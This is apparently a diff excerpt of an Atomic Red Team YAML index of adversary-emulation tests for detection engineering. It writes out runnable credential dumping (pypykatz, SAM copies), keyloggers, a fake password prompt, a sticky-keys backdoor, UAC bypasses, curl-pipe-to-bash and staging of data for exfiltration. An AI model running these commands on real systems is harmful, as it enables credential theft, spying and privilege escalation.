'echo "Python 2.7+ or 3.4+ must be installed" - ' +' executor: name: sh elevation_required: true @@ -6194,7 +6194,7 @@ credential-access: grep -i "PASS" "#{output_file}" cleanup_command: 'rm -f "#{output_file}" - ' +' T1606.002: technique: external_references: 
@@ -6289,13 +6289,13 @@ credential-access: dependencies: - description: 'AADInternals module must be installed. - ' +' prereq_command: 'if (Get-Module AADInternals) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Install-Module -Name AADInternals -Force - ' +' executor: command: | Import-Module AADInternals -Force @@ -6383,42 +6383,42 @@ credential-access: auto_generated_guid: a96872b2-cbf3-46cf-8eb4-27e8c0e85263 description: 'Parses registry hives to obtain stored credentials - ' +' supported_platforms: - windows dependency_executor_name: command_prompt dependencies: - description: 'Computer must have python 3 installed - ' +' prereq_command: | py -3 --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "Python 3 must be installed manually" - ' +' - description: 'Computer must have pip installed - ' +' prereq_command: | py -3 -m pip --version >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'echo "PIP must be installed manually" - ' +' - description: 'pypykatz must be installed and part of PATH - ' +' prereq_command: | pypykatz -h >nul 2>&1 exit /b %errorlevel% get_prereq_command: 'pip install pypykatz - ' +' executor: command: 'pypykatz live registry - ' +' name: command_prompt elevation_required: true - name: esentutl.exe SAM copy @@ -6444,12 +6444,12 @@ credential-access: executor: command: 'esentutl.exe /y /vss #{file_path} /d #{copy_dest}/#{file_name} - ' +' name: command_prompt elevation_required: true cleanup_command: 'del #{copy_dest}\#{file_name} >nul 2>&1 - ' +' - name: PowerDump Registry dump of SAM for hashes and usernames auto_generated_guid: 804f28fc-68fc-40da-b5a2-e9d0bce5c193 description: Executes a hashdump by reading the hasshes from the registry. @@ -6501,7 +6501,7 @@ credential-access: auto_generated_guid: 9d77fed7-05f8-476e-a81b-8ff0472c64d0 description: 'Dump hives from volume shadow copies with System.IO.File - ' +' supported_platforms: - windows input_arguments: 
@@ -7315,7 +7315,7 @@ collection: elevation_required: false command: 'dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file} - ' +' cleanup_command: 'Remove-Item -path #{output_file} -ErrorAction Ignore' T1560.003: technique: @@ -7411,7 +7411,7 @@ collection: auto_generated_guid: 391f5298-b12d-4636-8482-35d9c17d53a8 description: 'Uses GZip from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7427,10 +7427,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7438,15 +7438,15 @@ collection: command: '$which_python -c "import gzip;input_file=open(''#{path_to_input_file}'', ''rb'');content=input_file.read();input_file.close();output_file=gzip.GzipFile(''#{path_to_output_file}'',''wb'',''compresslevel=6'');output_file.write(content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using bz2 in Python (Linux) auto_generated_guid: c75612b2-9de0-4d7c-879c-10d7b077072d description: 'Uses bz2 from Python to compress files - ' +' supported_platforms: - linux input_arguments: 
@@ -7462,25 +7462,25 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash elevation_required: false command: '$which_python -c "import bz2;input_file=open(''#{path_to_input_file}'',''rb'');content=input_file.read();input_file.close();bz2content=bz2.compress(content,compresslevel=9);output_file=open(''#{path_to_output_file}'',''w+'');output_file.write(bz2content);output_file.close();" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using zipfile in Python (Linux) auto_generated_guid: 001a042b-859f-44d9-bf81-fd1c4e2200b0 description: 'Uses zipfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7496,10 +7496,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7507,15 +7507,15 @@ collection: command: '$which_python -c "from zipfile import ZipFile; ZipFile(''#{path_to_output_file}'', mode=''w'').write(''#{path_to_input_file}'')" - ' +' cleanup_command: 'rm #{path_to_output_file} - ' +' - name: Compressing data using tarfile in Python (Linux) auto_generated_guid: e86f1b4b-fcc1-4a2a-ae10-b49da01458db description: 'Uses tarfile from Python to compress files - ' +' supported_platforms: - linux input_arguments: @@ -7531,10 +7531,10 @@ collection: dependencies: - description: 'Requires Python - ' +' prereq_command: 'which_python=`which python`; $which_python -V - ' +' get_prereq_command: '' executor: name: bash @@ -7543,7 +7543,7 @@ collection: mode='w').write('#{path_to_input_file}')\" \n" cleanup_command: 'rm #{path_to_output_file} - ' +' T1560.001: technique: created: '2020-02-20T21:01:25.428Z' 
@@ -7626,10 +7626,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7639,10 +7639,10 @@ collection: elevation_required: false command: '"#{rar_exe}" a -r #{output_file} #{input_path}\*#{file_extension} - ' +' cleanup_command: 'del /f /q /s #{output_file} >nul 2>&1 - ' +' - name: Compress Data and lock with password for Exfiltration with winrar auto_generated_guid: 8dd61a55-44c6-43cc-af0c-8bdda276860c description: | @@ -7662,10 +7662,10 @@ collection: dependencies: - description: 'Rar tool must be installed at specified location (#{rar_exe}) - ' +' prereq_command: 'if not exist "#{rar_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading Winrar installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer} @@ -7703,11 +7703,11 @@ collection: dependencies: - description: 'Winzip must be installed - ' +' prereq_command: 'cmd /c ''if not exist "#{winzip_exe}" (echo 1) else (echo 0)'' - ' +' get_prereq_command: | if(Invoke-WebRequestVerifyHash "#{winzip_url}" "$env:Temp\winzip.exe" #{winzip_hash}){ Write-Host Follow the installation prompts to continue @@ -7727,7 +7727,7 @@ collection: auto_generated_guid: d1334303-59cb-4a03-8313-b3e24d02c198 description: 'Note: Requires 7zip installation - ' +' supported_platforms: - windows input_arguments: 
@@ -7742,10 +7742,10 @@ collection: dependencies: - description: '7zip tool must be installed at specified location (#{7zip_exe}) - ' +' prereq_command: 'if not exist "#{7zip_exe}" (exit /b 1) - ' +' get_prereq_command: | echo Downloading 7-zip installer bitsadmin /transfer myDownloadJob /download /priority normal "https://www.7-zip.org/a/7z2002-x64.exe" #{7zip_installer} @@ -7764,7 +7764,7 @@ collection: description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard zip compression. - ' +' supported_platforms: - linux - macos @@ -7781,11 +7781,11 @@ collection: dependencies: - description: 'Files to zip must exist (#{input_files}) - ' +' prereq_command: 'if [ $(ls #{input_files} | wc -l) > 0 ] && [ -x $(which zip) ] ; then exit 0; else exit 1; fi; - ' +' get_prereq_command: | (which yum && yum -y epel-release zip)||(which apt-get && apt-get install -y zip) echo Please set input_files argument to include files that exist @@ -7794,16 +7794,16 @@ collection: elevation_required: false command: 'zip #{output_file} #{input_files} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Compressed - nix - gzip Single File auto_generated_guid: cde3c2af-3485-49eb-9c1f-0ed60e9cc0af description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos 
@@ -7823,16 +7823,16 @@ collection: command: 'test -e #{input_file} && gzip -k #{input_file} || (echo ''#{input_content}'' >> #{input_file}; gzip -k #{input_file}) - ' +' cleanup_command: 'rm -f #{input_file}.gz - ' +' - name: Data Compressed - nix - tar Folder or File auto_generated_guid: 7af2b51e-ad1c-498c-aca8-d3290c19535a description: 'An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration. This test uses standard gzip compression. - ' +' supported_platforms: - linux - macos @@ -7848,28 +7848,28 @@ collection: dependencies: - description: 'Folder to zip must exist (#{input_file_folder}) - ' +' prereq_command: 'test -e #{input_file_folder} - ' +' get_prereq_command: 'echo Please set input_file_folder argument to a folder that exists - ' +' executor: name: sh elevation_required: false command: 'tar -cvzf #{output_file} #{input_file_folder} - ' +' cleanup_command: 'rm -f #{output_file} - ' +' - name: Data Encrypted with zip and gpg symmetric auto_generated_guid: '0286eb44-e7ce-41a0-b109-3da516e05a5f' description: 'Encrypt data for exiltration - ' +' supported_platforms: - macos - linux @@ -7892,7 +7892,7 @@ collection: prereq_command: 'if [ ! -x "$(command -v gpg)" ] || [ ! -x "$(command -v zip)" ]; then exit 1; fi; - ' +' get_prereq_command: "(which yum && yum -y epel-release zip gpg)||(which apt-get && apt-get install -y zip gpg)\n" executor: @@ -7906,7 +7906,7 @@ collection: ls -l #{test_folder} cleanup_command: 'rm -Rf #{test_folder} - ' +' T1123: technique: id: attack-pattern--1035cdf2-3e5f-446f-a7a7-e8f6d7925967 @@ -7956,7 +7956,7 @@ collection: executor: command: 'powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet - ' +' name: powershell T1119: technique: 
@@ -8026,7 +8026,7 @@ collection: for /R c: %f in (*.docx) do copy %f %temp%\T1119_command_prompt_collection cleanup_command: 'del %temp%\T1119_command_prompt_collection /F /Q >nul 2>&1 - ' +' name: command_prompt - name: Automated Collection PowerShell auto_generated_guid: 634bd9b9-dc83-4229-b19f-7f83ba9ad313 @@ -8042,7 +8042,7 @@ collection: cleanup_command: 'Remove-Item $env:TEMP\T1119_powershell_collection -Force -ErrorAction Ignore | Out-Null - ' +' name: powershell - name: Recon information for export with PowerShell auto_generated_guid: c3f6d794-50dd-482f-b640-0384fbb7db26 @@ -8131,7 +8131,7 @@ collection: auto_generated_guid: 0cd14633-58d4-4422-9ede-daa2c9474ae7 description: 'Add data to clipboard to copy off or execute commands from. - ' +' supported_platforms: - windows executor: @@ -8141,14 +8141,14 @@ collection: clip < %temp%\T1115.txt cleanup_command: 'del %temp%\T1115.txt >nul 2>&1 - ' +' name: command_prompt - name: Execute Commands from Clipboard using PowerShell auto_generated_guid: d6dc21af-bec9-4152-be86-326b6babd416 description: 'Utilize PowerShell to echo a command to clipboard and execute it - ' +' supported_platforms: - windows executor: @@ -8171,7 +8171,7 @@ collection: description: 'This module copies the data stored in the user''s clipboard and writes it to a file, $env:TEMP\atomic_T1115_clipboard_data.txt - ' +' supported_platforms: - windows input_arguments: @@ -8183,7 +8183,7 @@ collection: dependencies: - description: 'Microsoft #{ms_product} must be installed - ' +' prereq_command: | try { New-Object -COMObject "#{ms_product}.Application" | Out-Null @@ -8194,7 +8194,7 @@ collection: get_prereq_command: 'Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" - ' +' executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 
@@ -8204,7 +8204,7 @@ collection: cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore - ' +' name: powershell T1213.001: technique: @@ -8354,7 +8354,7 @@ collection: auto_generated_guid: de1934ea-1fbf-425b-8795-65fb27dd7e33 description: 'Hooks functions in PowerShell to read TLS Communications - ' +' supported_platforms: - windows input_arguments: @@ -8370,10 +8370,10 @@ collection: dependencies: - description: 'T1056.004x64.dll must exist on disk at specified location (#{file_name}) - ' +' prereq_command: 'if (Test-Path #{file_name}) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1056.004/bin/T1056.004x64.dll" -OutFile "#{file_name}" -UseBasicParsing @@ -8926,7 +8926,7 @@ collection: to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"'' - ' +' name: bash - name: PowerShell - Prompt User for Password auto_generated_guid: 2b162bfd-0928-4d4c-9ec3-4d9f88374b52 @@ -9097,7 +9097,7 @@ collection: .\T1056.001\src\Get-Keystrokes.ps1 -LogPath #{filepath} cleanup_command: 'Remove-Item $env:TEMP\key.log -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Living off the land Terminal Input Capture on Linux with pam.d @@ -9116,14 +9116,14 @@ collection: dependencies: - description: 'Checking if pam_tty_audit.so is installed - ' +' prereq_command: 'test -f ''/usr/lib/pam/pam_tty_audit.so -o /usr/lib64/security/pam_tty_audit.so'' - ' +' get_prereq_command: 'echo "Sorry, you must install module pam_tty_audit.so and recompile, for this test to work" - ' +' supported_platforms: - linux executor: 
@@ -9154,14 +9154,14 @@ collection: - description: 'This test requires to be run in a bash shell and that logger and tee are installed. - ' +' prereq_command: | if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi if [ ! -x "$(command -v logger)" ]; then echo -e "\n***** logger NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v tee)" ]; then echo -e "\n***** tee NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9171,7 +9171,7 @@ collection: tail /var/log/syslog cleanup_command: 'unset PROMPT_COMMAND - ' +' - name: Bash session based keylogger auto_generated_guid: 7f85a946-a0ea-48aa-b6ac-8ff539278258 description: "When a command is executed in bash, the BASH_COMMAND variable @@ -9188,14 +9188,14 @@ collection: dependencies: - description: 'This test requires to be run in a bash shell - ' +' prereq_command: 'if [ "$(echo $SHELL)" != "/bin/bash" ]; then echo -e "\n***** Bash not running! *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' input_arguments: output_file: name: output_file @@ -9211,7 +9211,7 @@ collection: cat #{output_file} cleanup_command: 'rm #{output_file} - ' +' - name: SSHD PAM keylogger auto_generated_guid: 81d7d2ad-d644-4b6a-bea7-28ffe43becca description: 'Linux PAM (Pluggable Authentication Modules) is used in sshd authentication. 
@@ -9219,20 +9219,20 @@ collection: of TTY input and capture all keystrokes in a ssh session and place them in the /var/log/audit/audit.log file after the session closes. - ' +' supported_platforms: - linux dependency_executor_name: sh dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: | if [ ! -x "$(command -v sshd)" ]; then echo -e "\n***** sshd NOT installed *****\n"; exit 1; fi if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi get_prereq_command: 'echo "" - ' +' input_arguments: user_account: description: Basic ssh user account for testing. @@ -9246,7 +9246,7 @@ collection: restart auditd\nssh #{user_account}@localhost \nwhoami\nsudo su\nwhoami\nexit\nexit\n" cleanup_command: 'cp -fv /tmp/sshd /etc/pam.d/ - ' +' - name: Auditd keylogger auto_generated_guid: a668edb9-334e-48eb-8c2e-5413a40867af description: "The linux audit tool auditd can be used to capture 32 and 64 bit @@ -9258,14 +9258,14 @@ collection: dependencies: - description: 'This test requires sshd and auditd - ' +' prereq_command: 'if [ ! -x "$(command -v auditd)" ]; then echo -e "\n***** auditd NOT installed *****\n"; exit 1; fi - ' +' get_prereq_command: 'echo "" - ' +' executor: name: sh elevation_required: true @@ -9274,7 +9274,7 @@ collection: $(date +\"%d/%m/%y %H:%M:%S\") \n" cleanup_command: 'systemctl restart auditd - ' +' T1557.001: technique: external_references: @@ -9448,17 +9448,17 @@ collection: command: 'Invoke-WebRequest "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.bat" -OutFile #{output_file} - ' +' cleanup_command: 'Remove-Item -Force #{output_file} -ErrorAction Ignore - ' +' name: powershell - name: Stage data from Discovery.sh auto_generated_guid: 39ce0303-ae16-4b9e-bb5b-4f53e8262066 description: 'Utilize curl to download discovery.sh and execute a basic information gathering shell script - ' +' supported_platforms: - linux - macos 
@@ -9471,7 +9471,7 @@ collection: command: 'curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074.001/src/Discovery.sh | bash -s > #{output_file} - ' +' name: bash - name: Zip a Folder with PowerShell for Staging in Temp auto_generated_guid: a57fbe4b-3440-452a-88a7-943531ac872a @@ -9493,10 +9493,10 @@ collection: command: 'Compress-Archive -Path #{input_file} -DestinationPath #{output_file} -Force - ' +' cleanup_command: 'Remove-Item -Path #{output_file} -ErrorAction Ignore - ' +' name: powershell T1114.001: technique: @@ -9567,23 +9567,23 @@ collection: dependencies: - description: 'Get-Inbox.ps1 must be located at #{file_path} - ' +' prereq_command: 'if (Test-Path #{file_path}\Get-Inbox.ps1) {exit 0} else {exit 1} - ' +' get_prereq_command: 'Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/src/Get-Inbox.ps1" -OutFile "#{file_path}\Get-Inbox.ps1" - ' +' executor: command: 'powershell -executionpolicy bypass -command #{file_path}\Get-Inbox.ps1 -file #{output_file} - ' +' cleanup_command: 'Remove-Item #{output_file} -Force -ErrorAction Ignore - ' +' name: powershell T1185: technique: @@ -9923,7 +9923,7 @@ collection: or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) - ' +' name: Screen Capture created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 id: attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688 @@ -9955,7 +9955,7 @@ collection: auto_generated_guid: 0f47ceb1-720f-4275-96b8-21f0562217ac description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: 
@@ -9966,16 +9966,16 @@ collection: executor: command: 'screencapture #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Screencapture (silent) auto_generated_guid: deb7d358-5fbd-4dc4-aecc-ee0054d2d9a4 description: 'Use screencapture command to collect a full desktop screenshot - ' +' supported_platforms: - macos input_arguments: @@ -9986,17 +9986,17 @@ collection: executor: command: 'screencapture -x #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: X Windows Capture auto_generated_guid: 8206dd0c-faf6-4d74-ba13-7fbe13dce6ac description: 'Use xwd command to collect a full desktop screenshot and review file with xwud - ' +' supported_platforms: - linux input_arguments: @@ -10018,11 +10018,11 @@ collection: dependencies: - description: 'Package with XWD and XWUD must exist on device - ' +' prereq_command: 'if #{package_checker} > /dev/null; then exit 0; else exit 1; fi - ' +' get_prereq_command: "sudo #{package_installer} \n" executor: command: | @@ -10030,14 +10030,14 @@ collection: xwud -in #{output_file} cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Capture Linux Desktop using Import Tool auto_generated_guid: 9cd1cccb-91e4-4550-9139-e20a586fcea1 description: 'Use import command from ImageMagick to collect a full desktop screenshot - ' +' supported_platforms: - linux input_arguments: 
@@ -10048,28 +10048,28 @@ collection: dependencies: - description: 'ImageMagick must be installed - ' +' prereq_command: 'if import -help > /dev/null 2>&1; then exit 0; else exit 1; fi - ' +' get_prereq_command: 'sudo apt-get -y install graphicsmagick-imagemagick-compat - ' +' executor: command: 'import -window root #{output_file} - ' +' cleanup_command: 'rm #{output_file} - ' +' name: bash - name: Windows Screencapture auto_generated_guid: 3c898f62-626c-47d5-aad2-6de873d69153 description: 'Use Psr.exe binary to collect screenshots of user display. Test will do left mouse click to simulate user behaviour - ' +' supported_platforms: - windows input_arguments: @@ -10091,7 +10091,7 @@ collection: cmd /c "timeout #{recording_time} > NULL && psr.exe /stop" cleanup_command: 'rm #{output_file} -ErrorAction Ignore - ' +' - name: Windows Screen Capture (CopyFromScreen) auto_generated_guid: e9313014-985a-48ef-80d9-cde604ffc187 description: | @@ -10115,7 +10115,7 @@ collection: $bitmap.Save("#{output_file}") cleanup_command: 'Remove-Item #{output_file} -ErrorAction Ignore - ' +' name: powershell T1213.002: technique: @@ -10505,7 +10505,7 @@ privilege-escalation: description: 'Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: "osk.exe" - ' +' type: String default: osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe @@ -10513,7 +10513,7 @@ privilege-escalation: description: 'Full path to process to attach to target in #{parent_list}. Default: cmd.exe - ' +' type: Path default: C:\windows\system32\cmd.exe executor: @@ -10547,7 +10547,7 @@ privilege-escalation: auto_generated_guid: 934e90cf-29ca-48b3-863c-411737ad44e3 description: 'Replace sticky keys binary (sethc.exe) with cmd.exe - ' +' supported_platforms: - windows executor: 
@@ -10558,7 +10558,7 @@ privilege-escalation: copy /Y C:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe cleanup_command: 'copy /Y C:\Windows\System32\sethc_backup.exe C:\Windows\System32\sethc.exe - ' +' name: command_prompt elevation_required: true T1547.014: @@ -10817,11 +10817,11 @@ privilege-escalation: - description: 'Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file}) - ' +' prereq_command: 'if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null @@ -10830,11 +10830,11 @@ privilege-escalation: - description: 'DLL''s must exist in the C:\Tools directory (T1546.010.dll and T1546.010x86.dll) - ' +' prereq_command: 'if ((Test-Path c:\Tools\T1546.010.dll) -and (Test-Path c:\Tools\T1546.010x86.dll)) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory C:\Tools -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll" -OutFile C:\Tools\T1546.010.dll @@ -10842,10 +10842,10 @@ privilege-escalation: executor: command: 'reg.exe import #{registry_file} - ' +' cleanup_command: 'reg.exe import #{registry_cleanup_file} >nul 2>&1 - ' +' name: command_prompt elevation_required: true T1546.011: 
@@ -10953,31 +10953,31 @@ privilege-escalation: - description: 'Shim database file must exist on disk at specified location (#{file_path}) - ' +' prereq_command: 'if (Test-Path #{file_path}) {exit 0} else {exit 1} - ' +' get_prereq_command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 New-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb" -OutFile "#{file_path}" - description: 'AtomicTest.dll must exist at c:\Tools\AtomicTest.dll - ' +' prereq_command: 'if (Test-Path c:\Tools\AtomicTest.dll) {exit 0} else {exit 1} - ' +' get_prereq_command: | New-Item -Type Directory (split-path c:\Tools\AtomicTest.dll) -ErrorAction ignore | Out-Null Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll" -OutFile c:\Tools\AtomicTest.dll executor: command: 'sdbinst.exe #{file_path} - ' +' cleanup_command: 'sdbinst.exe -u #{file_path} >nul 2>&1 - ' +' name: command_prompt elevation_required: true - name: New shim database files created in the default shim database directory @@ -11175,7 +11175,7 @@ privilege-escalation: description: 'This test submits a command to be run in the future by the `at` daemon. - ' +' supported_platforms: - linux input_arguments: 
@@ -11191,30 +11191,30 @@ privilege-escalation: dependencies: - description: 'The `at` and `atd` executables must exist in the PATH - ' +' prereq_command: 'which at && which atd - ' +' get_prereq_command: 'echo ''Please install `at` and `atd`; they were not found in the PATH (Package name: `at`)'' - ' +' - description: 'The `atd` daemon must be running - ' +' prereq_command: 'systemctl status atd || service atd status - ' +' get_prereq_command: 'echo ''Please start the `atd` daemon (sysv: `service atd start` ; systemd: `systemctl start atd`)'' - ' +' executor: name: sh elevation_required: false command: 'echo "#{at_command}" | at #{time_spec} - ' +' T1053.002: technique: external_references: @@ -11311,7 +11311,7 @@ privilege-escalation: elevation_required: false command: 'at 13:20 /interactive cmd - ' +' T1547.002: technique: id: attack-pattern--b8cfed42-6a8a-4989-ad72-541af74475ec @@ -11640,7 +11640,7 @@ privilege-escalation: cmd.exe /c eventvwr.msc cleanup_command: 'reg.exe delete hkcu\software\classes\mscfile /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Event Viewer (PowerShell) auto_generated_guid: a6ce9acf-842a-4af6-8f79-539be7608e2b @@ -11662,7 +11662,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\mscfile" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using Fodhelper auto_generated_guid: 58f641ea-12e3-499a-b684-44dee46bd182 @@ -11684,7 +11684,7 @@ privilege-escalation: cleanup_command: 'reg.exe delete hkcu\software\classes\ms-settings /f >nul 2>&1 - ' +' name: command_prompt - name: Bypass UAC using Fodhelper - PowerShell auto_generated_guid: 3f627297-6c38-4e7d-a278-fc2563eaaeaa @@ -11707,7 +11707,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell - name: Bypass UAC using ComputerDefaults (PowerShell) auto_generated_guid: 3c51abf2-44bf-42d8-9111-dc96ff66750f 
@@ -11730,7 +11730,7 @@ privilege-escalation: cleanup_command: 'Remove-Item "HKCU:\software\classes\ms-settings" -force -Recurse -ErrorAction Ignore - ' +' name: powershell elevation_required: true - name: Bypass UAC by Mocking Trusted Directories @@ -11778,7 +11778,7 @@ privilege-escalation: cleanup_command: 'Remove-Item -Path "HKCU:\Software\Classes\Folder" -Recurse -Force -ErrorAction Ignore - ' +' name: powershell - name: Disable UAC using reg.exe auto_generated_guid: 9e8af564-53ec-407e-aaa8-3cb20c3af7f9 @@ -11791,11 +11791,11 @@ privilege-escalation: command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f - ' +' cleanup_command: 'reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f - ' +' name: command_prompt elevation_required: true - name: Bypass UAC using SilentCleanup task @@ -11842,7 +11842,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11853,7 +11853,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11878,7 +11878,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11889,7 +11889,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
@@ -11913,7 +11913,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11924,7 +11924,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11949,7 +11949,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11960,7 +11960,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -11984,7 +11984,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -11995,7 +11995,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore @@ -12019,7 +12019,7 @@ privilege-escalation: dependencies: - description: 'UACME executable must exist on disk at specified location (#{uacme_exe}) - ' +' prereq_command: | $tempPath = cmd /c echo #{uacme_exe} if (Test-Path "$tempPath") {exit 0} else {exit 1} @@ -12030,7 +12030,7 @@ privilege-escalation: executor: command: '"#{uacme_exe}" - ' +' cleanup_command: | powershell Stop-Process -Name cmd -Force -ErrorAction Ignore powershell Stop-Process -Name mmc -Force -ErrorAction Ignore 
